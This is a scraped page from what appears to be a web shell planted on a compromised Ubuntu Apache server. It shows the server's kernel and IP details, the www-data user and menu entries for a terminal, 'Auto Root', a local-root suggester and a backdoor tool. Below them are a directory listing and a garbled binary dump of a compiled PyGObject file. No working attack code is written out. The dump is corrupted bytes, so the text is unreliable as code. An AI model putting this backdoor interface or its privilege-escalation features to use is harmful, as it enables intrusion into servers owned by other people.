Linux jobworks 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
Apache/2.4.58 (Ubuntu)
Server IP : 10.0.1.5 & Your IP : 216.73.217.52
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
gi /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.cpython-312.pyc
5.9
KB
-rw-r--r--
2025-08-05 17:02
_constants.cpython-312.pyc
2.48
KB
-rw-r--r--
2025-08-05 17:02
_error.cpython-312.pyc
1.95
KB
-rw-r--r--
2025-08-05 17:02
_gtktemplate.cpython-312.pyc
12.22
KB
-rw-r--r--
2025-08-05 17:02
_option.cpython-312.pyc
17.15
KB
-rw-r--r--
2025-08-05 17:02
_ossighelper.cpython-312.pyc
8.77
KB
-rw-r--r--
2025-08-05 17:02
_propertyhelper.cpython-312.pyc
15.42
KB
-rw-r--r--
2025-08-05 17:02
_signalhelper.cpython-312.pyc
10.38
KB
-rw-r--r--
2025-08-05 17:02
docstring.cpython-312.pyc
6.71
KB
-rw-r--r--
2025-08-05 17:02
importer.cpython-312.pyc
5.03
KB
-rw-r--r--
2025-08-05 17:02
module.cpython-312.pyc
9.11
KB
-rw-r--r--
2025-08-05 17:02
pygtkcompat.cpython-312.pyc
601
B
-rw-r--r--
2025-08-05 17:02
types.cpython-312.pyc
12.92
KB
-rw-r--r--
2025-08-05 17:02
Save
Rename
� ��fW$ � �H � d dl mZ G d� de� Z G d� de� Zd� Zd� Zy) � )�_gic �v � e Zd ZdZ G d� de� Zdd�Zddej dddddfd�Z d d�Z d � Zd d �Zd� Z y)�Signala� Object which gives a nice API for creating and binding signals. :param name: Name of signal or callable closure when used as a decorator. :type name: str or callable :param callable func: Callable closure method. :param GObject.SignalFlags flags: Flags specifying when to run closure. :param type return_type: Return type of the Signal. :param list arg_types: List of argument types specifying the signals function signature :param str doc: Documentation of signal object. :param callable accumulator: Accumulator method with the signature: func(ihint, return_accu, handler_return, accu_data) -> boolean :param object accu_data: User data passed to the accumulator. :Example: .. code-block:: python class Spam(GObject.Object): velocity = 0 @GObject.Signal def pushed(self): self.velocity += 1 @GObject.Signal(flags=GObject.SignalFlags.RUN_LAST) def pulled(self): self.velocity -= 1 stomped = GObject.Signal('stomped', arg_types=(int,)) @GObject.Signal def annotated_signal(self, a:int, b:str): "Python3 annotation support for parameter types. def on_pushed(obj): print(obj) spam = Spam() spam.pushed.connect(on_pushed) spam.pushed.emit() c �@ � e Zd ZdZd� Zd� Zd� Zd� Zd� Zd� Z d� Z d � Zy )�Signal.BoundSignalz� Temporary binding object which can be used for connecting signals without specifying the signal name string to connect. c �. � t j | |� S �N)�str�__new__��cls�name�args�kargss �2/usr/lib/python3/dist-packages/gi/_signalhelper.pyr zSignal.BoundSignal.__new__N s � ��;�;�s�D�)�)� c �J � t j | � || _ || _ y r )r �__init__�signal�gobj)�selfr r s r r zSignal.BoundSignal.__init__Q s � ��L�L��� �D�K��D�Ir c � � d| z S )NzBoundSignal("%s")� �r s r �__repr__zSignal.BoundSignal.__repr__V s � �&��-�-r c �V � | j j | j g|��i |��S )zCall the signals closure.)r �funcr �r r r s r �__call__zSignal.BoundSignal.__call__Y s'